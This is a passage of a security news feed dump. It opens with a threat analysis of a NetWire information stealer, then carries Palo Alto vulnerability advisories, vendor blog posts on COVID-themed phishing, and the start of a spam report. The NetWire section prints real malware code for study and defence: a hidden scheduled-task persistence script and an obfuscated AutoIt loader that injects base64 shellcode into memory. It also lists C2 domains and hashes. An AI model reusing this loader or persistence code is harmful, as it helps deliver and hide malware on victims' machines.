_\n\n'$settings.MultipleInstances = 2 ; ' & _\n\n'$settings.ExecutionTimeLimit = \"\"\"PT0H\"\"\" ; ' & _\n\n'$startTrigger=$task.Triggers.Create(2) ; ' & _\n\n'$startTrigger.Enabled=$true ; ' & _\n\n'$startTrigger.Repetition.Interval=\"\"\"PT6M\"\"\" ; ' & _\n\n'$startTrigger.Repetition.StopAtDurationEnd=$false ; ' & _\n\n'$startTrigger.Id=\"\"\"DailyTriggerId\"\"\" ; ' & _\n\n\"$startTrigger.StartBoundary = \" & \"'\" & @YEAR & '-' & @MON & '-' & @MDAY & 'T' & @HOUR & ':' & @MIN & ':' & $Time & \"'\" & \" ;\" & _\n\n'$action_ = $task.Actions.Create(0) ; ' & _\n\n\"$action_.Path = '\" & '\"\"\"%appdata%\\Microsoft\\AutoIt3.exe\"\"\"' & \"' ; \" & _\n\n'$action_.Arguments = ' & '\"\"\"\"\"\"\"\"\"%appdata%\\Microsoft\\' & $DSerial & '\"\"\"\"\"\"\"\"\" ; ' & _ ; To Delete Dropper Add This line : \"\"\"\"\"\"dropper\"\"\"\"\"\"\"\"\"\n\n'$ts.GetFolder(\"\"\"\\\\\\\"\"\").RegisterTaskDefinition(\"\"\"Software enc\"\"\", $task, 6 , $null, $null, 3) ; ' & _\n\n'} ' & _\n\n'Catch [System.Exception]{' & _\n\n'}' , \" , 'open' , @SW_HIDE )\n\nEndFunc \n \n--- \n \nTable 2: zDownload3.torrent script to install scheduled task\n\nThis script begins with acquiring the serial number of the local hard drive into the variable $DSerial. This value is the drive\u2019s Volume Serial Number, as shown below, converted from hex to a decimal. For example, the serial number below, 0xAC515015 will set the variable to \u201c2891010069\u201d. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/04/Figure1.png>) \n\n\nFigure 1: Example of a Volume Serial Number used to create the final script file name\n\nOn first execution it will first edit the zDownload2.torrent file to add random data to the end of it, likely for the means of changing the file\u2019s hash value. This line will look similar to:\n\n$IJWEHSTWEMZOJXTHCUM = \"IJWEHSTWEMZOJXTHCUM\"\n\nIt will then create the folder of %AppData%\\Microsoft and copy the zDownload2.torrent file there with the filename of the above serial number. This would create a file named similar to: C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\2891010069.\n\nThe script will then create a Windows Scheduled Task named \u201cSoftware enc\u201d that will start this application every six minutes to ensure it remains active.\n\n## NetWire Code Execution\n\nThe final script, zDownload2.torrent, contains the core functionality that is launched by this service:\n\n#MgKnJwMDXOEjNTGFCIYRuIdXzrQHakyWNuCvzwOZzl\n\nglobal $OI='mpCsxHHZckazlLhRQQOQYnlEnglwrtNbQbjfmIGQiaoBAETbQLXCTLEWTuWSTOKtTbuwKSRoYGQHLGGQISEAokTwCDKCaGPSlhjqANVDlEuRRMmLOFfzlVxjQxoPyCdxjsIEphFebMAdGzaaIWxyotgLDmWUWklhzhOJSdSIBKKUjjHchmPfnkuhQgmrXFxyUKRTuCQFSC'\n\n<truncated for brevity>\n\n$OI&='iJRQhoYW1lAGhlZXJuaGdldHBU/3UE6F////+DxAyJRQzoAAAAAFgFYv///1CDwARQU/9VDItEJPwPt0AGUDHA/1UIZj2CI3QYZoP4UHQSZj27AXQMi00ASTAED4P5AHX3g8QgYWFVieX/dRT/dRD/dQz/dQj/0InsXcIQAGCNdCQkrZGtk62FyXUol4neuGV4cGGruG5kIDOruDItYnmruHRlIGursQjzpWoBWKulpaVhw5ZgYInnMcDjemBgakBZ86RfVzHAUOgQAAAAyEDZUepi+3P6UMth2HLpQ14kB400RqzUEA+20A+27KzUEA+23A+2wLkQDAgHizSfATSHizSvMzSH08aJNK+Sh+vB6Qh151hAPFB1rmG5EAAAAK0BB6/i+v9G8GGKFAcwE0NAPEDg9euCYWFhww=='\n\nglobal $CJhU[17] = ['ITLmWmsKTmWbFsFmEZsoYzNSgRHzhILBqETIzhKSBGbeKSQYjnMscFJrpKLdrKQYyBlGSWXiyHcexlphHtbddXNgOmLeGjQmwBvVAkbCmXKthkhoBAlNTFcPBnSYtZbCNHVyjFremBPeicnbFbRvEqfFkGsdXNeQOzAlVDhOWbvMAdXomwMgDKMDPCRNgkARZrDJjUOXVRgsneOGHYthGNIlmYGWPNrshwJzpurSRVAtRSKrpqsxWFaQUPLIyTzFhjVaQIRXNVVGIPVYkwIZwbgpaNWrjvVFozzHWUuzNEeckwhnCeXDYCfLRBBwtEmTfELWNbsqOJFxGUkJIgnffmTOeUROUcrRmmnLDwYYlxIAyYeqjBLlmHeTJqdrVBGTPsauBzLjiwizplaSvPAbKGJnGiyUyXwUwGumgI', _ \n\n$OI,'ex'&'e'&'cute',\")]0[)'23lenrek','rts' ,'AeldnaHeludoMteG','rtp','23lenrek'(llaCllD,'rtp',426031,'tni',)'SVXyK'(lavE,'rtp',58834+93768+)'SVXyK'(lavE ,'lcedc:tni'(sserddAllaCllD+)0,'rtp',0,'rtp',818131,'*tni',)'SVXyK'(lavE,'rtp',1,'tni',0,'tni',)248,]1[UhJC$(diMgnirtS,'rts','AyraniBoTgnirtStpyrC','tni','23tpyrC'(llaCllD+)]0[)46,'tni',88221,'tni',794803,'tni' ,0,'rtp','collAlautriV','rtp','23lenrek'(llaCllD,'SVXyK'(ngissA+)1,'ediHnocIyarT'(tpo\",\"$CJhU[5]($CJhU[2],StringReverse($CJhU[3]))\",CALL,'YFJfstXDxdrpzOdduFUYYStFPhlJgzTFlMHrZGZZqhlPeNOBXyjxmaWvwZVkyrkWuPSBhsdWDhTsInpwxjZmDOCspVIgcOzjdxtmGULEeShjLAMqksCrOMDmKHgKpkSpDahHzNqzIS']\n\n#SEUYYgkwcHgw\n\n$CJhU[5]($CJhU[2],$CJhU[4])\n\n#fjacbxEJppOYfXcfnyOgJQvknLTNQrBcasXvRlBkAsA\n\n$LBRYCZXJNWXM = \"LBRYCZXJNWXM\" \n \n--- \n \nTable 3: Abbreviated zDownload2.torrent script that contains and launches the NetWire malware\n\nThe majority of this script is the containment of a large block of base64 encoded data containing the malicious code. The remainder is simply an AutoIt script to load that code into memory. Here, it uses very basic obfuscation to place the commands and data into separate chunks of an array, and then execute a set of code that\u2019s stored in reverse order. Once in normal order, this loading code reads as one long line of multiple commands, each separated by a \u201c+\u201d. Cleaned up, this reads as:\n\nopt('TrayIconHide',1)\n\n+\n\nAssign('KyXVS',DllCall('kernel32\u2032,'ptr','VirtualAlloc','ptr',0, 'int',308497,'int',12288,'int',64)[0])\n\n+\n\nDllCall('Crypt32\u2032,'int', 'CryptStringToBinaryA','str',StringMid($CJhU[1],842),'int',0,'int',1,'ptr',Eval('KyXVS'),'int*',131818,'ptr',0,'ptr',0)\n\n+\n\nDllCallAddress('int:cdecl', Eval('KyXVS')+86739+43885,'ptr',Eval('KyXVS'),'int',130624,'ptr',DllCall('kernel32\u2032,'ptr','GetModuleHandleA', 'str','kernel32\u2032)[0]) \n \n--- \n \nTable 4: AutoIt code to decode the base64 payload and write it to memory\n\nThese four commands are responsible for first hiding the AutoIt tray icon and then injecting the code into memory. While the script contains a very large block of Base64 data, we see here with the StringMid($CJhU[1], 842) command that only the bytes starting at offset 842 are used. These are base64 decoded using the CryptStringToBinaryA API call, written into memory, and then executed. \n\nBy manually debugging AutoIt, and following the injection of code, we see the code written for execution. In total, this accounts for 131,820 bytes of shellcode.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/04/Figure2.png>) \n\n\nFigure 2: Decoded base64 payload after written to memory\n\nNotably, though, the execution begins at the offset of \u201c86739+43885\u201d (130,624 or 0x1FE40). This is represented below by the highlighted code of 0x56, 0x55, 0x57, 0x53 at offset 0x68FE40.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/04/Figure3.png>) \n\n\nFigure 3: Decoded base64 payload entry point at 0x68FE40\n\n## NetWire Functionality\n\nThis variant of NetWire falls in-line with the many other variants previously reported upon. NetWire is an information stealer that collects a wide assortment of data from the victimized system. This includes the stored passwords from a wide variety of web browsers: Chrome, Chromium, Firefox, Opera, Brave, Comodo Dragon, and Yandex. It will also target chat applications such as Pidgin and run a keylogger that outputs encrypted logs to the %AppData%\\WinLocal folder, with each file named after the respective date of collection.\n\nFor example, a victim system would store encrypted keystrokes to files similar to:\n\nC:\\Users\\<username>\\AppData\\Roaming\\WinLocal\\05-04-2020\n\nC:\\Users\\<username>\\AppData\\Roaming\\WinLocal\\06-04-2020\n\nC:\\Users\\<username>\\AppData\\Roaming\\WinLocal\\07-04-2020\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/04/Figure4.png>) \n\n\nFigure 4: Hex dump showing the Window Title stored using the built-in keylogger\n\nThis sample beacons to one of a series of domain names, each attempted in order. These domains are listed in the IOC section below, and all transmit over TCP port 3320. The primary communications were over brothergoal[.]ddns[.]net. The remainder of the domains appear to not resolve and may potentially be placeholders, each having a prefix of Oussemab: oussemaba[.]ddns[.]net, oussemabb[.]ddns[.]net, oussemabc[.]ddns[.]net, and oussemabf[.]ddns[.]net.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/04/Figure5.png>) \n\n\nFigure 5: Decoded list of domain names for C2 communication\n\nPrevious NetWire analysis scripts are still effective against this variant, such as the string obfuscation routine that uses the lookup key of \u201c_BqwHaF8TkKDMfOzQASx4VuXdZibUIeylJWhj0m5o2ErLt6vGRN9sY1n3Ppc7g-C\u201d. These strings, such as the list of domains above, are deobfuscated using this routine:\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/04/Figure6.png>) \n\n\nFigure 6: NetWire function used to decode encoded strings\n\n## Indicators of Compromise:\n\n**Indicator**\n\n| \n\n**Type** \n \n---|--- \n \nBrothergoal[.]ddns[.]net\n\n| \n\nDomain \n \n197.240.116.25\n\n| \n\nIP Address \n \ncfb39cfa0699d3f325854a7de3409161\n\n| \n\nzDownload2.torrent MD5 \n \n2c5c4f7bf50d5506ef443c3ad08f0ca62d2c330c724680019ae16c828d6b20ba\n\n| \n\nzDownload2.torrent SHA256 \n \n43523693235fcbe2ff7db35873b231ee\n\n| \n\nzDownload3.torrent MD5 \n \ne2f388f375c4b04be87ec7cf9eaacaa1b7c6b9e7065b7b6c8124fd1ba7934248\n\n| \n\nzDownload3.torrent SHA256 \n \n \n\n \n\nThe post [TAU Threat Analysis: NetWire Variant Leveraging AutoIt Scripts and Windows Shortcut Links](<https://www.carbonblack.com/2020/04/08/tau-threat-analysis-netwire-variant-leveraging-autoit-scripts-and-windows-shortcut-links/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2020-04-08T17:04:25", "published": "2020-04-08T17:04:25", "id": "CARBONBLACK:007567E883C3946AB7E67E4A8F44ACCB", "href": "https://www.carbonblack.com/2020/04/08/tau-threat-analysis-netwire-variant-leveraging-autoit-scripts-and-windows-shortcut-links/", "type": "carbonblack", "title": "TAU Threat Analysis: NetWire Variant Leveraging AutoIt Scripts and Windows Shortcut Links", "cvss": {"score": 0.0, "vector": "NONE"}}], "paloalto": [{"lastseen": "2020-04-08T20:38:48", "bulletinFamily": "software", "description": "An insecure temporary file vulnerability in Palo Alto Networks Traps allows a local authenticated Windows user to escalate privileges or overwrite system files.\n\nThis issue affects Palo Alto Networks Traps 5.0 versions before 5.0.8; 6.1 versions before 6.1.4 on Windows.\n\nThis issue does not affect Cortex XDR 7.0.\nThis issue does not affect Traps for Linux or MacOS.\n\n**Work around:**\nThere are no viable workarounds for this issue.", "modified": "2020-04-08T16:00:00", "published": "2020-04-08T16:00:00", "id": "PA-CVE-2020-1991", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2020-1991", "title": "Traps: Insecure temporary file vulnerability may allow privilege escalation on Windows", "type": "paloalto", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-09T00:38:49", "bulletinFamily": "software", "description": "An unquoted search path vulnerability in the Windows release of GlobalProtect Agent allows an authenticated local user with file creation privileges on the root of the OS disk (C:\\) or to Program Files directory to gain system privileges.\n\nThis issue affects Palo Alto Networks GlobalProtect Agent 5.0 versions before 5.0.5; 4.1 versions before 4.1.13 on Windows;\n\n**Work around:**\nDo not grant file creation privileges on the root of the OS disk (C:\\) or 'Program Files' directory to unprivileged users.", "modified": "2020-04-08T16:00:00", "published": "2020-04-08T16:00:00", "id": "PA-CVE-2020-1988", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2020-1988", "title": "GlobalProtect Agent: Local privilege escalation due to an unquoted search path vulnerability", "type": "paloalto", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-08T20:38:48", "bulletinFamily": "software", "description": "Improper input validation vulnerability in Secdo allows an authenticated local user with 'create folders or append data' access to the root of the OS disk (C:\\) to cause a system crash on every login. This issue affects all versions Secdo for Windows.\n\n**Work around:**\nExploitation of this issue can be prevented by creating a \"C:\\proc\" folder and not allowing unprivileged users to access that folder.", "modified": "2020-04-08T16:00:00", "published": "2020-04-08T16:00:00", "id": "PA-CVE-2020-1986", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2020-1986", "title": "Secdo: Local authenticated users can cause Windows system crash", "type": "paloalto", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-08T20:38:46", "bulletinFamily": "software", "description": "TechSupport files generated on Palo Alto Networks VM Series firewalls for Microsoft Azure platform configured with high availability (HA) inadvertently collect Azure dashboard service account credentials.\nThese credentials are equivalent to the credentials associated with the Contributor role in Azure. A user with the credentials will be able to manage all the Azure resources in the subscription except for granting access to other resources. These credentials do not allow login access to the VMs themselves.\nThis issue affects VM Series Plugin versions before 1.0.9 for PAN-OS 9.0.\nThis issue does not affect VM Series in non-HA configurations or on other cloud platforms. It does not affect hardware firewall appliances.\nSince becoming aware of the issue, Palo Alto Networks has safely deleted all the tech support files with the credentials. We now filter and remove these credentials from all TechSupport files sent to us.\nThe TechSupport files uploaded to Palo Alto Networks systems were only accessible by authorized personnel with valid Palo Alto Networks credentials. We do not have any evidence of malicious access or use of these credentials.\n\n\n**Work around:**\nDo not generate TechSupport files on the affected VMs.\n", "modified": "2020-04-08T16:00:00", "published": "2020-04-08T16:00:00", "id": "PA-CVE-2020-1978", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2020-1978", "title": "VM-Series on Microsoft Azure: Inadvertent collection of credentials in Tech support files on HA configured VMs", "type": "paloalto", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-08T20:38:48", "bulletinFamily": "software", "description": "Incorrect Default Permissions on C:\\Programdata\\Secdo\\Logs folder in Secdo allows local authenticated users to overwrite system files and gain escalated privileges. This issue affects all versions Secdo for Windows.\n\n**Work around:**\nChange permission on C:\\Programdata\\Secdo\\Logs to not allow unprivileged users access.", "modified": "2020-04-08T16:00:00", "published": "2020-04-08T16:00:00", "id": "PA-CVE-2020-1985", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2020-1985", "title": "Secdo: Incorrect Default Permissions ", "type": "paloalto", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2020-04-08T15:39:48", "bulletinFamily": "blog", "description": "The need for companies to quickly enable remote access to business-critical applications was highlighted in a recent Akamai blog -- [Enabling Business Continuity in an Uncertain Global Environment](<https://blogs.akamai.com/2020/03/enabling-business-continuity-in-an-uncertain-global-environment.html>).\n\nHowever, despite the current environment, what is already evident is that once businesses have addressed the remote access need, the next imperative is to look at how they can quickly improve security for employees who are now working remotely. Unfortunately, these uncertain times have created a target-rich environment for the scammers, hackers, and phishers.\n\nFor example, Brian Krebs [highlighted](<https://krebsonsecurity.com/2020/03/live-coronavirus-map-used-to-spread-malware/#more-50850>) how attackers are using off-the-shelf malware infection kits that leverage an interactive infection map created by Johns Hopkins University to generate malicious websites and phishing emails. Once installed on a device, the malware harvests user credentials.\n\nSecurity researchers at Akamai have also observed phishing attacks [leveraging recycled phishing kits](<https://blogs.akamai.com/sitr/2020/04/threat-actors-recycling-phishing-kits-in-new-coronavirus-covid-19-campaigns.html>) in a series of campaigns taking advantage of the health crisis. Over the past few weeks, Akamai researchers have seen several examples of phishing URLs that include the terms _corona_, _coronavirus_, or _World Health Organization (WHO)_. Most of these URLs are newly registered. The rapid proliferation of these targeted domains is also discussed in a recent [ZDNet](<https://www.zdnet.com/article/thousands-of-covid-19-scam-and-malware-sites-are-being-created-on-a-daily-basis/>) article that stated thousands of new sites using similar words are being registered and activated every day. Many of these new sites are being used for phishing attacks, distributing malware (including ransomware), or for financial fraud including tricking users into paying for fake cures, supplements, or vaccines.\n\nBusinesses face two significant security challenges.\n\nThe first is that, during this stressful time and especially when people are distracted and are more likely to be proactively looking for information, they are more likely to fall for a malicious phishing email or click on a \"news\" story that takes them to a malicious web page.\n\nSecondly, many companies have designed their security stack with the assumption that the vast majority of employees will not be working remotely 100% of the time and will spend most of their time inside a network perimeter where tighter security controls are in place. When hundreds or even thousands of employees are suddenly working from home outside the normal perimeter, securing endpoint devices becomes a significantly bigger challenge.\n\nAkamai Enterprise Threat Protector is a cloud-based secure web gateway that can be deployed in minutes and provides you with visibility into user and endpoint activity, regardless of location, allowing you to block malicious requests and enforce AUPs, comprehensively protecting your employees and your business. Enterprise Threat Protector can provide an effective layer of additional proactive security to complement existing endpoint antivirus software you have deployed. In addition, there's no need to use a VPN to backhaul web traffic to your head office for inspection and enforcement -- all web traffic can be sent to the Akamai Intelligent Edge Platform. \n \nEnterprise Threat Protector leverages real-time threat intelligence based on Akamai's unprecedented view of the Internet and multiple inline and offline payload analysis engines, including Akamai's [zero-day phishing detection ](<https://blogs.akamai.com/2019/10/real-time-phishing-protections.html>)engine. \n \nTo find out more about Enterprise Threat Protector and how it can help your business improve its security posture for remote working, please visit [akamai.com/etp](<http://akamai.com/etp>). Akamai is also offering a Business Continuity Assistance Program that includes complimentary 60-day usage of the Enterprise Application Access solution. [Learn more about how Akamai can help you](<https://www.akamai.com/us/en/campaign/business-continuity-assistance-program.jsp>).\n\n", "modified": "2020-04-08T15:10:00", "published": "2020-04-08T15:06:50", "id": "AKAMAIBLOG:0F4249DDEC39E9FEAE42A99C8B330E41", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/ffR4t_Iz4ps/business-continuity-and-security-in-an-uncertain-global-environment.html", "type": "akamaiblog", "title": "Business Continuity and Security in an Uncertain Global Environment", "cvss": {"score": 0.0, "vector": "NONE"}}], "mssecure": [{"lastseen": "2020-04-08T17:13:33", "bulletinFamily": "blog", "description": "Ready or not, much of the world was thrust into working from home, which means more people and devices are now accessing sensitive corporate data across home networks. Defenders are working round the clock to secure endpoints and ensure the fidelity of not only those endpoints, but also identities, email, and applications, as people are using whatever device they need to get work done. This isn\u2019t something anyone, including our security professionals, were given time to prepare for, yet many customers have been thrust into a new environment and challenged to respond quickly. Microsoft is here to help lighten the load on defenders, offer guidance on what to prioritize to keep your workforce secure, and share resources about the built-in protections of our products.\n\n### Attackers are capitalizing on fear. We\u2019re watching them. We\u2019re pushing back.\n\nOur inboxes, mobile alerts, TVs, and news updates are all COVID-19, all the time. It\u2019s overwhelming and attackers know it. They know many are clicking without looking because stress levels are high and they\u2019re taking advantage of that. That\u2019s why we\u2019re seeing an increase in the success of phishing and social engineering attacks. Attackers don\u2019t suddenly have more resources they\u2019re diverting towards tricking users; instead they\u2019re pivoting their existing infrastructure, like ransomware, phishing, and other malware delivery tools, to include COVID-19 keywords that get us to click. Once we click, they can infiltrate our inboxes, steal our credentials, share more malicious links with coworkers across collaboration tools, and lie in wait to steal information that will give them the biggest payout. This is where intelligent solutions that can monitor for malicious activity _across_ \u2013 that\u2019s the key word \u2013 emails, identities, endpoints, and applications with built-in automation to proactively protect, detect, respond to, and prevent these types of attacks from being successful will help us fight this battle against opportunistic attackers.\n\nOur threat intelligence teams at Microsoft are actively monitoring and responding to this shift in focus. Our data shows that these COVID-19 themed threats are retreads of existing attacks that have been slightly altered to tie to this pandemic. This means we\u2019re seeing a changing of lures, not a surge in attacks. Our intelligence shows that these attacks are settling into a rhythm that is the normal ebb and flow of the threat environment:\n\n * Every country in the world has seen at least one COVID-19 themed attack (see map below). The volume of successful attacks in outbreak-hit countries is increasing, as fear and the desire for information grows. Our telemetry shows that China, the United States, and Russia have been hit the hardest.\n * The trendy and pervasive Trickbot and Emotet malware families are very active and rebranding their lures to take advantage of the outbreak. We have observed 76 threat variants to date globally using COVID-19 themed lures (map below).\n * Microsoft tracks thousands of email phishing campaigns that cover millions of malicious messages every week. Phishing campaigns are more than just one targeted email at one targeted user. They include potentially hundreds or thousands of malicious emails targeting hundreds or thousands of users, which is why they can be so effective. Of the millions of targeted messages we see each day, roughly 60,000 include COVID-19 related malicious attachments or malicious URLs.\n * While that number sounds very large, it\u2019s important to note that that is _less than two percent_ of the total volume of threats we actively track and protect against daily, which reinforces that the overall volume of threats is not increasing but attackers are shifting their techniques to capitalize on fear. Attackers are impersonating established entities like the World Health Organization (WHO), Centers for Disease Control and Prevention (CDC), and the Department of Health to get into inboxes. Here\u2019s an example of what just one of these malicious emails looks like now compared to before the COVID-19 crisis:\n\n\n\n * In a single day, SmartScreen sees and processes more than 18,000 malicious COVID-19-themed URLs and IP addresses. This again shows us that attackers are getting more aggressive and agile in the delivery of their attacks \u2013 using the same delivery methods, but swapping out the malicious URLs on a more frequent basis in an effort to evade machine learning protections.\n * Microsoft Office 365 Advanced Threat Protection prevented a big phishing campaign that used a fake Office 365 sign-in page to capture credentials. Roughly 2,300 unique HTML attachments posing as COVID-19 financial compensation information were caught in 24 hours in this one campaign. We expect to see more campaigns that utilize the economic fear from lost income, as governments widen the mandatory shutdown of their economies and stimulus funds begin to be issued in the U.S.\n * Several advanced persistent threat and nation-state actors have been observed [targeting healthcare organizations](<https://www.microsoft.com/security/blog/2020/04/01/microsoft-works-with-healthcare-organizations-to-protect-from-popular-ransomware-during-covid-19-crisis-heres-what-to-do/>) and using COVID-19-themed lures in their campaigns. We continue to identify, track, and [build proactive protections](<https://techcommunity.microsoft.com/t5/azure-sentinel/protecting-your-teams-with-azure-sentinel/ba-p/1265761>) against these threats in all of our security products. When customers are affected by these attacks, Microsoft notifies the customer directly to help speed up investigations. We also report malicious COVID-19-themed domains and URLs to the proper authorities [so that they can be taken down](<https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/>), and where possible, the individuals behind them prosecuted.\n\n\n\n_Relative impact of COVID-19 themed attacks across the world by file count (as of April 7, 2020)_\n\n### From endpoints and identities to the cloud, we have you covered\n\nWhile phishing email is a common attack vector, it\u2019s only one of the many points of entry for attackers. Defenders need a much broader view and solutions for remediation than visibility into just one entry method. An attacker\u2019s primary goal is to gain entry and expand across domains so they can persist in an organization and lie in wait to steal or encrypt as much sensitive information as they can to reap the biggest payout. Defenders require visibility across each of these domains and automated correlation across emails, identities, endpoints, and cloud applications to see the full scope of compromise. Only with this view can defenders adequately remediate affected assets, apply Conditional Access, and prevent the same or similar attacks from being successful again.\n\nDuring this trying time, we want to remind our customers what protections you have built into our products and offer guidance for what to prioritize:\n\n * **Protect endpoints with Microsoft Defender ATP**, which covers licensed users for up to five concurrent devices that can be easily onboarded at any time. Microsoft Defender ATP monitors threats from across platforms, including macOS. Our [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-atp/secure-your-remote-workforce-with-microsoft-defender-atp/ba-p/1271806>) includes additional guidance, best practices, onboarding, and licensing information.\n * **Enable**** multi-factor authentication (MFA) and Conditional Access through Azure Active Directory to protect **[**identities**](<https://www.microsoft.com/security/blog/2020/03/31/making-easier-remote-workforce-securely-access-apps-from-anywhere/>). This is more important than ever to mitigate credential compromise as users work from home. We recommend connecting all apps to Azure AD for single sign-on \u2013 from SaaS to on-premises apps; enabling MFA and applying Conditional Access policies; and extending secure access to contractors and partners. Microsoft also offers a [free Azure AD service](<https://azure.microsoft.com/en-us/pricing/details/active-directory/>) for single sign-on, including MFA using the Microsoft Authenticator app.\n * **Safeguard inboxes and email accounts with **[**Office 365 ATP**](<https://docs.microsoft.com/en-us/office365/servicedescriptions/office-365-advanced-threat-protection-service-description>)**, **Microsoft\u2019s cloud-based email filtering service, which shields against phishing and malware, including features to safeguard your organization from messaging-policy violations, targeted attacks, zero-days, and [malicious URLs](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide>). Intelligent recommendations from [Security Policy Advisor](<https://aka.ms/spaannouncement>) can help reduce macro attack surface, and the [Office Cloud Policy Service](<https://techcommunity.microsoft.com/t5/office-365-blog/security-baseline-recommendations-now-available-in-office-cloud/ba-p/1097622>) can help you implement security baselines.\n * **Microsoft Cloud App Security** can [help protect against](<https://www.microsoft.com/security/blog/2019/11/06/microsoft-cloud-security-solutions-provide-comprehensive-cross-cloud-protection/>) shadow IT and unsanctioned app usage, identify and remediate cloud-native attacks, and control how data travels across cloud apps from Microsoft or third-party applications.\n\n[Microsoft Threat Protection](<https://www.microsoft.com/security/blog/2020/02/20/microsoft-threat-protection-intelligence-automation/>) correlates signals from across each of these domains using Azure ATP, Microsoft Defender ATP, Office 365 ATP, and Microsoft Cloud App Security, to understand the entire attack chain to help defenders prioritize which threats are most critical to address and to auto-heal affected user identities, email inboxes, endpoints, and cloud apps back to a safe state. Our threat intelligence combines signals from not just one attack vector like email phishing, but from across emails, identities, endpoints, and cloud apps to understand how the threat landscape is changing and build that intelligence into our products to prevent attack sprawl and persistence. The built-in, automated remediation capabilities across these solutions can also help reduce the manual workload on defenders that comes from the multitude of new devices and connections.\n\n[Azure Sentinel](<https://aka.ms/AzureSentinelCOVID19Help>) is a cloud-native SIEM that brings together insights from Microsoft Threat Protection and Azure Security Center, along with the whole world of third-party and custom application logs to help security teams gain visibility, triage, and investigate threats across their enterprise. As with all Microsoft Security products, Azure Sentinel customers benefit from Microsoft threat intelligence to detect and hunt for attacks. Azure Sentinel makes it easy to add new data sources and scale existing ones with built-in workbooks, hunting queries, and analytics to help teams identify, prioritize, and respond to threats. We recently shared a [threat hunting notebook](<https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Guided%20Hunting%20-%20Covid-19%20Themed%20Threats.ipynb>) developed to hunt for COVID-19 related threats in Azure Sentinel.\n\nCloud-delivered protections are a critical part of staying up to date with the latest security updates and patches. If you don\u2019t already have them turned on, we highly recommend it. We also offer advanced hunting through both Microsoft Threat Protection and Azure Sentinel.\n\n### We\u2019ll keep sharing and protecting \u2013 stay tuned, stay safe\n\nRemember that we at Microsoft are 3,500 defenders strong. We\u2019re very actively monitoring the threat landscape, we\u2019re here to help: we\u2019re providing resources, guidance, and for dire cases we have support available from services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\nAll of our guidance related to COVID-19 is and will be posted [here](<https://news.microsoft.com/covid-19-response/>). We will continue to share updates across channels to keep you informed. Please stay safe, stay connected, stay informed.\n\nTHANK YOU to our defenders who are working tirelessly to keep us secure and connected during this pandemic.\n\n \n\n_-Rob and all of us from across Microsoft security _\n\n \n\nTo stay up to date with verified information on the COVID-19 crisis, the following sites are available:\n\n * [WHO International COVID-19 Solidarity Response Fund](<https://www.who.int/emergencies/diseases/novel-coronavirus-2019/donate>)\n * [CDC Coronavirus (COVID-19)](<https://www.cdc.gov/coronavirus/2019-ncov/prevent-getting-sick/social-distancing.html>)\n * [FBI Public Service Announcement, April 2, 2020](<https://www.ic3.gov/media/2020/200401.aspx>): Cyber Actors Take Advantage of COVID-19 Pandemic to Exploit Increased Use of Virtual Environments\n * [The White House, CDC, FEMA webpage](<https://www.coronavirus.gov/>)\n\n \n\nThe post [Microsoft shares new threat intelligence, security guidance during global crisis](<https://www.microsoft.com/security/blog/2020/04/08/microsoft-shares-new-threat-intelligence-security-guidance-during-global-crisis/>) appeared first on [Microsoft Security.", "modified": "2020-04-08T15:00:02", "published": "2020-04-08T15:00:02", "id": "MSSECURE:F6668FFB987F371A7FEB497F0CD74327", "href": "https://www.microsoft.com/security/blog/2020/04/08/microsoft-shares-new-threat-intelligence-security-guidance-during-global-crisis/", "type": "mssecure", "title": "Microsoft shares new threat intelligence, security guidance during global crisis", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2020-04-08T11:44:03", "bulletinFamily": "blog", "description": "\n\n## Figures of the year\n\n * The share of spam in mail traffic was 56.51%, which is 4.03 p.p. more than in 2018.\n * The biggest source of spam this year was China (21.26%).\n * 44% of spam e-mails were less than 2 KB in size.\n * Malicious spam was detected most commonly with the Exploit.MSOffice.CVE-2017-11882 verdict.\n * The Anti-Phishing system was triggered 467,188,119 times.\n * 17 % of unique users encountered phishing.\n\n## Trends of the year\n\n### Beware of novelties\n\nIn 2019, attackers were more active than usual in their exploitation of major sports and movie events to gain access to users' financial or personal data. Premieres of TV shows and films, and sports broadcasts were used as bait for those looking to save money by watching on \"unofficial\" resources.\n\nA search for \"Watch latest X for free\" (where X = _Avengers_ movie, _Game of Thrones_ season, Stanley Cup game, US Open, etc.) returned links to sites offering the opportunity to do precisely that. On clicking through to these resources, the broadcast really did begin, only to stop after a couple of minutes. To continue viewing, the user was prompted to create a free account (only an e-mail address and password were required). However, when the Continue button was clicked, the site asked for additional confirmation.\n\nAnd not just any old information, but bank card details, including the three-digit security code (CVV) on the reverse side. The site administrators assured that funds would not be debited from the card, but that this data was needed only to confirm the user's location (and hence right to view the content). However, instead of continuing the broadcast, the scammers simply pocketed the details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150402/sl_spamreport_2019_01.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150400/sl_spamreport_2019_02.png>)\n\nNew gadgets were also deployed as a bait. Cybercriminals created fake pages mimicking official 